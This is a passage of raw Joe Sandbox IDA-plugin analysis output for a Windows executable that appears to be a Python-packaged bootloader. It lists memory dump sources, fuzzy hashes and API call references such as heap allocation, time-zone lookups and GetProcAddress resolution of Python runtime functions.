                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                                                                                                                                        • Instruction ID: 7a06b9c6abdf75096759afad354190088683bf0211a59fe6dc1e68b228ec7096
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B015E21A0D68341FBA0FE616D421799290AF49794FD451B4F97C836C6EFBCE440C2A2
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F250C90C: HeapAlloc.KERNEL32(?,?,?,00007FF7F24FFFB0,?,?,?,00007FF7F250161A,?,?,?,?,?,00007FF7F2502E09), ref: 00007FF7F250C94A
                                                                                                                                                                                                                        • RtlReAllocateHeap.NTDLL(?,?,00000000,00007FF7F251274B,?,?,?,00007FF7F2509267,?,?,?,00007FF7F250915D,?,?,?,00007FF7F250953E), ref: 00007FF7F2516FF1
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Heap$AllocAllocate
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2177240990-0
                                                                                                                                                                                                                        • Opcode ID: e382dc26276f22423dcda25660a1935eb2fafde86fe36b33accd7187197a4d18
                                                                                                                                                                                                                        • Instruction ID: e25777de221d6f2a8934b8fbaab43471650f495dc6e3c8d5413d8de9caa163d8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e382dc26276f22423dcda25660a1935eb2fafde86fe36b33accd7187197a4d18
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6301AD00F1C24344FF54BE226861679C2804F84BB0F9896B0ED3D872CAEDECE480C2B0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                        • Opcode ID: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                                                                        • Instruction ID: 2a8705c26aa0f59c892a0ee469c5ddbb563af6e0802896bc79338c8774d3e491
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5E0BDA0E1824783FB14FEA85EC62BE91109FA8340FC050B0DA28072C7FD9C7C84D6B2
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,00000000,00007FF7F250A63A,?,?,?,00007FF7F25043FD,?,?,?,?,00007FF7F250979A), ref: 00007FF7F250DEFD
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                        • Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                                                                        • Instruction ID: 144f660c2eb38e5cca7bcbfad92b04be3c128fed8f71f91bee0aaaa4e6d86f46
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1F04F04B0A34781FF54FEA15C213B5E2919F58B50FC894B0D92E872C1FD9CE481C2B0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF7F24FFFB0,?,?,?,00007FF7F250161A,?,?,?,?,?,00007FF7F2502E09), ref: 00007FF7F250C94A
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                        • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                        • Instruction ID: 6e745d01255eaa1be1c2e395e87ab0e56b5faff784a350867a62fa151ab42fcd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ABF05E41F1A24745FF14BEA15C11375D1805F49B71F881AB09C3E872C1EE9CB541C2B0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3140674995-0
                                                                                                                                                                                                                        • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                                        • Instruction ID: 59a5d799ae06ae1d79139fe55dd339f565cab3b626c62ed7711647e2704d91eb
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29314D72709A8186EB64DF60E8503FEB360FB84754F44443ADA6D47B94DFB8D548C760
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Message$ErrorFormatLast
                                                                                                                                                                                                                        • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                                                                                                                                        • API String ID: 3971115935-1149178304
                                                                                                                                                                                                                        • Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                                                                                                        • Instruction ID: 7071319f3abb2c7111bedfda0b267c0be0b0a3e3be8012db56fb9893e81bb4ac
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47214472618B9582E720EB10F4506EAB364FB88794F801136EBDD53AD8DFBCD546CB90
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7F2514F55
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F25148A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F25148BC
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2509C58: RtlFreeHeap.NTDLL(?,?,?,00007FF7F2512032,?,?,?,00007FF7F251206F,?,?,00000000,00007FF7F2512535,?,?,?,00007FF7F2512467), ref: 00007FF7F2509C6E
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2509C58: GetLastError.KERNEL32(?,?,?,00007FF7F2512032,?,?,?,00007FF7F251206F,?,?,00000000,00007FF7F2512535,?,?,?,00007FF7F2512467), ref: 00007FF7F2509C78
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2509C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7F2509BEF,?,?,?,?,?,00007FF7F2509ADA), ref: 00007FF7F2509C19
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2509C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7F2509BEF,?,?,?,?,?,00007FF7F2509ADA), ref: 00007FF7F2509C3E
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7F2514F44
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2514908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F251491C
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7F25151BA
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7F25151CB
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7F25151DC
                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7F251541C), ref: 00007FF7F2515203
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4070488512-0
                                                                                                                                                                                                                        • Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                                                                                                        • Instruction ID: 3aeaa48b98e9a2c873c26974e658c10dac43a099650be9958546b26e2cdc9940
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48D1AC26B1824286E724FF21D8412B9A3A1FF84BA4FC45175EA6D476D5DFBCE841C3E0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                        • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                                                        • Instruction ID: 528803218fcb19e591bae4e0415ca435193335fb45a3e9866dcc71a59756d36e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80319332708B8185DB24DF25E8502AEB3A0FB88768F900135EAAD43B99DF7CC545CB50
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2227656907-0
                                                                                                                                                                                                                        • Opcode ID: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                                                                                                                                        • Instruction ID: 4813f5e59ea0b7b396eeedfce053fe82119ad78a9841b4487507826d608a0186
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ABB1B462B1869281EB60FF2298105B9E391EB44BF4F845171EE6D07BC9DFBCE449C790
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7F25151BA
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2514908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F251491C
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7F25151CB
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F25148A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F25148BC
                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7F25151DC
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F25148D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F25148EC
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2509C58: RtlFreeHeap.NTDLL(?,?,?,00007FF7F2512032,?,?,?,00007FF7F251206F,?,?,00000000,00007FF7F2512535,?,?,?,00007FF7F2512467), ref: 00007FF7F2509C6E
                                                                                                                                                                                                                          • Part of subcall function 00007FF7F2509C58: GetLastError.KERNEL32(?,?,?,00007FF7F2512032,?,?,?,00007FF7F251206F,?,?,00000000,00007FF7F2512535,?,?,?,00007FF7F2512467), ref: 00007FF7F2509C78
                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7F251541C), ref: 00007FF7F2515203
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3458911817-0
                                                                                                                                                                                                                        • Opcode ID: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                                                                                                                                        • Instruction ID: 96b935644db19b6607c3e7d850424867186d8d1230eac5860491b7d4160effcc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae64d4b013316384daf219013b3406c3cfe35626df30cbdeb691f729cbc9c9de
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45519032B1864286E714FF21E8815A9A361FF48794FC06175EA2D436D5DFBCE441C7E0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF7F24F5C57,?,00007FF7F24F308E), ref: 00007FF7F24F50C0
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF7F24F5C57,?,00007FF7F24F308E), ref: 00007FF7F24F5101
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF7F24F5C57,?,00007FF7F24F308E), ref: 00007FF7F24F5126
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF7F24F5C57,?,00007FF7F24F308E), ref: 00007FF7F24F514B
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF7F24F5C57,?,00007FF7F24F308E), ref: 00007FF7F24F5173
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF7F24F5C57,?,00007FF7F24F308E), ref: 00007FF7F24F519B
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF7F24F5C57,?,00007FF7F24F308E), ref: 00007FF7F24F51C3
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF7F24F5C57,?,00007FF7F24F308E), ref: 00007FF7F24F51EB
                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF7F24F5C57,?,00007FF7F24F308E), ref: 00007FF7F24F5213
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressProc
                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                        • API String ID: 190572456-2007157414
                                                                                                                                                                                                                        • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                                        • Instruction ID: 0eb45044a2fa33c178268928b13b559f27ab4070ce5afcf48fa81ed2b559c5cd
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46126CA4A0EB0395FB55BF04A850174A3A1AF45761BE424B5C43E173E0EFFDB948D2E1
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.1633222594.00007FF7F24F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F24F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633200438.00007FF7F24F0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633255068.00007FF7F251B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F252E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633286062.00007FF7F2534000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.1633331407.00007FF7F2536000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7f24f0000_21AB.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressProc
